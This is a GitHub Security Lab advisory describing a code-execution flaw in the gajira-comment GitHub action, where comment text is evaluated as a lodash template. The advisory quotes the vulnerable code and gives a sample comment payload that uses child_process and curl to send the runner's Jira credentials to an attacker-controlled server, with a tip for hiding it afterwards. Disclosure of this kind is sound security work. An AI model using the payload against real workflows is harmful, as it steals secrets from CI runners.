skip to content
Back to
Home Bounties Research Advisories Get Involved Events
December 3, 2020

GHSL-2020-173: Undocumented template expression evaluation in the gajira-comment GitHub action - CVE-2020-14189

Jaroslav Lobacevski


The gajira-comment GitHub action isupports undocumented template syntax that may lead to arbitrary code execution.


gajira-comment GitHub action.

Tested Version



Issue: The potentially untrusted input value comment is evaluated as code by node.js

The action supports additional template transformation of the comment input value - all placeholders between double braces like {{event.issue.body}} are replaced with the according values from github.event context. The intention most probably was to use it like:

uses: atlassian/gajira-comment@v2.0.1
    comment: |
    Comment created by {{ event.comment.user.login }}
    {{ event.comment.body }}

i.e. without the dollar sign and the root github context object.

However this feature is not documented and the built-in GitHub context expressions are used by the users of the action instead, like:

uses: atlassian/gajira-comment@v2.0.1
    comment: |
    ${{ github.event.comment.body }}

This may lead to a double template evaluation if the user input contains {{}} itself. A public issue in a similar action was created by one of the action users that proves it does happen.

The internal template feature is implemented in a way that the user input is interpreted as javascript:

const _ = require('lodash')

const rawComment = this.argv.comment

_.templateSettings.interpolate = /{{([\s\S]+?)}}/g
const compiled = _.template(rawComment)
const interpolatedComment = compiled({ event: this.githubEvent })


This vulnerability allows for arbitrary code execution in the context of a GitHub runner. For example a user may create a comment with the body

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the body of the comment to Never mind my bad. and close it.



Coordinated Disclosure Timeline


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2020-173 in any communication regarding this issue.